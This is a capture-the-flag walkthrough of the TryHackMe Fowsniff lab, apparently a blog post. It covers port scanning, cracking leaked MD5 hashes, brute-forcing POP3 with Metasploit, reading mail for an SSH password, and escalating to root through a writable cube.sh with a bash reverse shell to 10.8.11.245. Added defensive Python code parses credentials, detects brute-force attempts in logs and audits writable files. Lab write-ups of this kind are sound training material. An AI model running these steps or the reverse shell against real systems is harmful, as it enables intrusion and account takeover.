THM-Fowsniff

This post was last updated early on 18 January 2025.

Prerequisite: connect with OpenVPN (see the THM tutorial for the details). If it won't connect, go through a proxy; I used a US one.


First, scan the ports with nmap:

nmap -T4 -A -v 10.10.63.96
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Fowsniff Corp - Delivering Solutions
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL SASL(PLAIN) USER CAPA AUTH-RESP-CODE TOP PIPELINING RESP-CODES
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LITERAL+ ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS more have SASL-IR post-login listed capabilities ID IMAP4rev1 Pre-login OK
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=1/17%OT=22%CT=1%CU=38918%PV=Y%DS=3%DC=T%G=Y%TM=678A67F
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:05%GCD=1%ISR=109%TI=Z%CI=I%TS=8)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%TS=8)
OS:SEQ(SP=108%GCD=1%ISR=109%TI=Z%CI=I%TS=8)SEQ(SP=FB%GCD=2%ISR=104%TI=Z%CI=
OS:I%TS=8)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%
OS:O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W
OS:6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF55%RUD=G)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF5F%RUD=G)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF79%RUD=G)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF9F%RUD=G)U1(R=Y%DF=N%T=40%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AFA6%RUD=G)IE(R=N)

Uptime guess: 198.049 days (since Wed Jul 3 21:13:58 2024)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 0.19 ms 172.17.16.1
2 360.21 ms 10.8.0.1
3 360.96 ms 10.10.63.96

The scan found four open ports: 22, 80, 110 and 143.

nmap --script=vuln -p22,80,110,143 10.10.63.96

The vuln scripts found nothing, so go straight to port 80.

The site says the company suffered a data breach: the attacker hijacked the official website and posted sensitive information. Time to gather information.

The link in the post should point here, and its contents should be the following.

Email passwords were leaked; save them:

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Crack them with john against rockyou.txt:

└─$ john --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt  pop.txt
Using default input encoding: UTF-8
Loaded 8 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=32
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2 (seina@fowsniff)
orlando12 (parede@fowsniff)
apples01 (tegel@fowsniff)
skyler22 (baksteen@fowsniff)
mailcall (mauer@fowsniff)
carp4ever (mursten@fowsniff)
bilbo101 (mustikka@fowsniff)
7g 0:00:00:00 DONE (2025-01-17 22:58) 16.27g/s 33356Kp/s 33356Kc/s 79672KC/s filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Save the pieces of information to separate files; first the passwords:

cat pop.txt |awk -F ' '  '{print $1}' >pop3pass.txt

Then save the account names as well:

cat pop.txt |awk -F ' '  '{print $2}'|awk -F '@' '{print $1}'|awk -F '(' '{print $2}' >pop3cred.txt
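The awk pipeline above splits john's output on spaces, which breaks as soon as a recovered password contains a space. Below is a small parser, added for this writeup and not part of the original post or of john, that reads both the leaked `login:hash` dump and john's `password (login)` result lines, classifies the stored hash by shape (32 bare hex characters is consistent with the unsalted Raw-MD5 john reported, which is why a wordlist run over it finishes in a second), joins the cracked passwords back to the leaked accounts, and produces the same username and password lists the awk step does. The sample input is embedded and copied from the page, so nothing is fetched or cracked here.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed samples in the two formats the writeup handles: the leaked
# "login:hash" dump and john's "password (login)" result lines. Hashes,
# logins and passwords are copied from the page; the surrounding john status
# lines are shortened copies of its output.
LEAK_DUMP = """\
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
"""

JOHN_OUTPUT = """\
Using default input encoding: UTF-8
Loaded 8 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
scoobydoo2 (seina@fowsniff)
mailcall (mauer@fowsniff)
7g 0:00:00:00 DONE (2025-01-17 22:58) 16.27g/s 33356Kp/s 33356Kc/s 79672KC/s filimani..*7¡Vamos!
Session completed.
"""

LEAK_RE = re.compile(r"^(?P<login>[^:\s]+@[^:\s]+):(?P<hash>\S+)$")
# john prints "<password> (<login>)"; the password may itself contain spaces
# or parentheses, so anchor on the final "(login)" group instead of splitting
# on whitespace the way the awk pipeline does.
JOHN_RE = re.compile(r"^(?P<password>.+) \((?P<login>[^()\s]+@[^()\s]+)\)$")


def hash_kind(digest: str) -> str:
    """Classify a stored credential by shape. 32 lowercase hex characters with
    no salt or scheme prefix is consistent with unsalted MD5, the format john
    loaded ("no different salts", Raw-MD5)."""
    if re.fullmatch(r"[0-9a-f]{32}", digest):
        return "raw-md5-like"
    if re.fullmatch(r"[0-9a-f]{40}", digest):
        return "raw-sha1-like"
    if digest.startswith("$"):
        return "modular-crypt (salted, scheme-tagged)"
    return "unknown"


def parse_leak(text: str) -> Dict[str, str]:
    """Map login -> stored hash, ignoring lines that do not fit the format."""
    result: Dict[str, str] = {}
    for line in text.splitlines():
        m = LEAK_RE.match(line.strip())
        if m:
            result[m.group("login")] = m.group("hash").lower()
    return result


def parse_john(text: str) -> Dict[str, str]:
    """Map login -> recovered password from john's result lines, skipping the
    banner, progress and summary lines."""
    creds: Dict[str, str] = {}
    for line in text.splitlines():
        m = JOHN_RE.match(line.rstrip())
        if m:
            creds[m.group("login")] = m.group("password")
    return creds


def join_results(leak: Dict[str, str], cracked: Dict[str, str]) -> List[Tuple[str, str, str, Optional[str]]]:
    """One row per leaked account: (login, hash kind, hash, password or None)."""
    return [(login, hash_kind(h), h, cracked.get(login)) for login, h in sorted(leak.items())]


def split_credentials(cracked: Dict[str, str]) -> Tuple[List[str], List[str]]:
    """Local-part usernames and passwords as two lists, the same content the
    awk pipeline writes to pop3cred.txt and pop3pass.txt."""
    users = [login.split("@", 1)[0] for login in cracked]
    passwords = list(cracked.values())
    return users, passwords


if __name__ == "__main__":
    for row in join_results(parse_leak(LEAK_DUMP), parse_john(JOHN_OUTPUT)):
        print(row)
```

Accounts whose password is `None` in the joined rows are the ones the wordlist did not cover; the shape check is the first thing to record in an incident report, since an unsalted fast hash is what turns a leaked dump into cleartext passwords within seconds.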

Hydra is a very popular password-cracking tool that supports brute-forcing many protocols (HTTP, FTP, SSH and so on); it tries to log in by exhaustively guessing passwords. (I didn't get it to work.)

So, following the task question:

Using the usernames and passwords you captured, can you use Metasploit to brute-force the POP3 login?

msf6 auxiliary(scanner/pop3/pop3_login) > set RHOSTS 10.10.63.96
RHOSTS => 10.10.63.96
msf6 auxiliary(scanner/pop3/pop3_login) > set RPORT 110
RPORT => 110
msf6 auxiliary(scanner/pop3/pop3_login) > set USER_FILE pop3cred.txt
USER_FILE => pop3cred.txt
msf6 auxiliary(scanner/pop3/pop3_login) > set PASS_FILE pop3pass.txt
PASS_FILE => pop3pass.txt
msf6 auxiliary(scanner/pop3/pop3_login) > run
[+] 10.10.63.96:110 - 10.10.63.96:110 - Success: 'seina:scoobydoo2' '+OK Logged in. '
[!] 10.10.63.96:110 - No active DB -- Credential data will not be saved!
[-] 10.10.63.96:110 - 10.10.63.96:110 - Failed: 'parede:scoobydoo2', '-ERR [AUTH] Authentication failed.'
[-] 10.10.63.96:110 - 10.10.63.96:110 - Failed: 'parede:orlando12', '-ERR [AUTH] Authentication failed.'
[-] 10.10.63.96:110 - 10.10.63.96:110 - Failed: 'parede:apples01', '-ERR [AUTH] Authentication failed.'
[-] 10.10.63.96:110 - 10.10.63.96:110 - Failed: 'parede:skyler22', ''
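From the server side, the pop3_login run above leaves a burst of failed PLAIN authentications from one source, followed by a success, in the mail server's log. As an added example (my code, not from the page, Metasploit or Dovecot), here is a detector for that pattern run over constructed log lines written in the shape of Dovecot's pop3-login messages (the exact format is an approximation). It flags a source IP with `threshold` failures inside `window_seconds`, lists the users it tried (many users from one source is the spraying signature), and raises the severity when a successful login from that source follows, which is what the `seina` result above looks like to the defender.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

# Constructed log excerpt in the shape of Dovecot's syslog lines (an
# approximation written for this example, not real server logs). The logins,
# the source 10.8.11.245 and the target 10.10.63.96 are taken from the page;
# timestamps, session ids and 192.0.2.7 (a documentation address) are invented.
SAMPLE_LOG = """\
Jan 17 22:58:02 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<parede>, method=PLAIN, rip=10.8.11.245, lip=10.10.63.96, session=<s1>
Jan 17 22:58:04 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<parede>, method=PLAIN, rip=10.8.11.245, lip=10.10.63.96, session=<s2>
Jan 17 22:58:06 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<parede>, method=PLAIN, rip=10.8.11.245, lip=10.10.63.96, session=<s3>
Jan 17 22:58:09 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=10.8.11.245, lip=10.10.63.96, session=<s4>
Jan 17 22:58:12 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mursten>, method=PLAIN, rip=10.8.11.245, lip=10.10.63.96, session=<s5>
Jan 17 22:58:20 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=10.8.11.245, lip=10.10.63.96, mpid=1201, session=<s6>
Jan 17 23:10:00 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 5 secs): user=<mauer>, method=PLAIN, rip=192.0.2.7, lip=10.10.63.96, session=<t1>
Jan 17 23:10:30 fowsniff dovecot: pop3-login: Login: user=<mauer>, method=PLAIN, rip=192.0.2.7, lip=10.10.63.96, mpid=1210, session=<t2>
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<outcome>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>, "
    r".*?rip=(?P<rip>[0-9.]+)"
)


def parse_line(line: str, year: int = 2025) -> Optional[dict]:
    """Return {ts, user, rip, ok} for a pop3-login line, None for anything else.
    Syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "user": m.group("user"), "rip": m.group("rip"),
            "ok": m.group("outcome") == "Login"}


def detect_bruteforce(lines: List[str], threshold: int = 3, window_seconds: int = 60) -> Dict[str, dict]:
    """Per source IP: flag when `threshold` failures fall inside a sliding
    window of `window_seconds`; note any successful login after the flag."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    by_rip: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        by_rip[e["rip"]].append(e)

    alerts: Dict[str, dict] = {}
    for rip, evs in by_rip.items():
        fails = [e for e in evs if not e["ok"]]
        crossed_at = None
        start = 0
        for end, e in enumerate(fails):
            # Slide the window start forward until it fits within window_seconds.
            while (e["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                crossed_at = e["ts"]
                break
        if crossed_at is None:
            continue
        logins_after = [e["user"] for e in evs if e["ok"] and e["ts"] >= crossed_at]
        alerts[rip] = {
            "failures": len(fails),
            "users_tried": sorted({e["user"] for e in fails}),
            "first_flagged": crossed_at.isoformat(),
            "logins_after_flag": logins_after,
            "severity": "high" if logins_after else "medium",
        }
    return alerts


if __name__ == "__main__":
    for rip, alert in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(rip, alert)
```

The single failure from 192.0.2.7 followed by a login is the normal typo-then-retry shape and is not reported; the nmap output earlier shows this server offers `SASL(PLAIN)` and `USER` on plain port 110, so these log lines, not the network, are where a defender sees the guessing.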

So seina's password hasn't been changed yet; try connecting:

┌──(orange㉿Coyano)-[/mnt/c/Users/0raN9e/Desktop]
└─$ nc 10.10.63.96 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.

Then read the messages:

list
+OK 2 messages:
1 1622
2 1280
.
repr 1
-ERR Unknown command: REPR
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone


.
retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.

.

Reading the mails reveals the temporary SSH password S1ck3nBluff+secureshell. The second mail says baksteen hadn't yet got round to reading the first one, so that SSH password hasn't been changed.

So we can log in:

baksteen@fowsniff:~$ ls
Maildir term.txt
baksteen@fowsniff:~$ cat te*
I wonder if the person who coined the term "One Hit Wonder"
came up with another other phrases.

Nothing much there; let's look at privilege escalation.

baksteen@fowsniff:~$ sudo -l
[sudo] password for baksteen:
Sorry, user baksteen may not run sudo on fowsniff.
baksteen@fowsniff:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)

Look for writable files:

baksteen@fowsniff:~$ find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null
/opt/cube/cube.sh
/home/baksteen/.cache/motd.legal-displayed
/home/baksteen/Maildir/dovecot-uidvalidity
/home/baksteen/Maildir/dovecot.index.log
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff
/home/baksteen/Maildir/dovecot-uidlist
/home/baksteen/.viminfo
/home/baksteen/.bash_history
/home/baksteen/.lesshsQ
/home/baksteen/.bash_logout
/home/baksteen/term.txt
/home/baksteen/.profile
/home/baksteen/.bashrc

There's a shell script; take a look.

baksteen@fowsniff:/opt/cube$ ls -al
total 12
drwxrwxrwx 2 root root 4096 Mar 11 2018 .
drwxr-xr-x 6 root root 4096 Mar 11 2018 ..
-rw-rwxr-- 1 parede users 851 Mar 11 2018 cube.sh
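The listing shows the pattern the rest of the escalation hinges on: cube.sh is owned by parede but writable by group `users` (mode -rw-rwxr--), and it sits in a directory anyone can write to, so any local user can edit or replace it. As an added example (my code, not from the page), here is an audit that walks a tree and reports files whose own mode, or whose parent directory, lets someone other than the owner modify them. `demo()` rebuilds the /opt/cube layout with constructed contents inside a fresh temporary directory and runs the audit there, so it touches nothing on the real system.

```python
import os
import stat
import tempfile
from dataclasses import dataclass, field
from typing import List


@dataclass
class Finding:
    path: str
    mode: str                                # symbolic mode as ls prints it
    reasons: List[str] = field(default_factory=list)


def check_file(path: str) -> Finding:
    """Report why a file could be altered by a user other than its owner."""
    st = os.lstat(path)
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    # A world-writable directory without the sticky bit lets any user unlink
    # the file and drop a replacement, whatever the file's own mode says.
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        reasons.append("parent-dir-world-writable")
    return Finding(path, stat.filemode(st.st_mode), reasons)


def scan_tree(root: str) -> List[Finding]:
    """Audit every regular file under root; return only those with findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            if os.path.isfile(p) and not os.path.islink(p):
                f = check_file(p)
                if f.reasons:
                    findings.append(f)
    return sorted(findings, key=lambda f: f.path)


def demo() -> List[Finding]:
    """Constructed replica of the layout from the writeup: a world-writable
    'cube' directory holding a group-writable cube.sh, beside a properly
    protected control script. Built in a fresh temp dir."""
    root = tempfile.mkdtemp(prefix="cube-audit-")
    cube = os.path.join(root, "cube")
    os.mkdir(cube)
    os.chmod(cube, 0o777)                    # drwxrwxrwx as on the page
    script = os.path.join(cube, "cube.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho 'constructed placeholder'\n")
    os.chmod(script, 0o674)                  # -rw-rwxr-- as on the page
    safe_dir = os.path.join(root, "safe")
    os.mkdir(safe_dir)
    os.chmod(safe_dir, 0o755)
    safe = os.path.join(safe_dir, "ok.sh")
    with open(safe, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(safe, 0o644)
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f.mode, f.path, ", ".join(f.reasons))
```

On a real host the same `scan_tree` run over /opt and /etc is a cheap periodic check; the fix for a finding like cube.sh is root ownership, mode 0755 or tighter, and a parent directory that is not world-writable.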

Looking at it, it just prints some text.

Spawn a reverse shell and see (WSL has no network adapter, so I caught it from cmd after downloading nc).

bash -c 'bash -i >& /dev/tcp/10.8.11.245/5566 0>&1'
ssh baksteen@10.10.63.96
S1ck3nBluff+secureshell

Start it again and find the flag:

root@fowsniff:/root# ls
ls
Maildir
flag.txt
root@fowsniff:/root# cat flag.txt
cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ' \/ _` | '_/ _` | _| || | / _` | _| / _ \ ' \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/

(_)
|--------------
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|--------------
|
|
|
|
|
|
---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.


Author: orange
Published: 18 January 2025
Updated: 18 January 2025
https://0ran9ewww.github.io/2025/01/18/渗透/Fowsniff/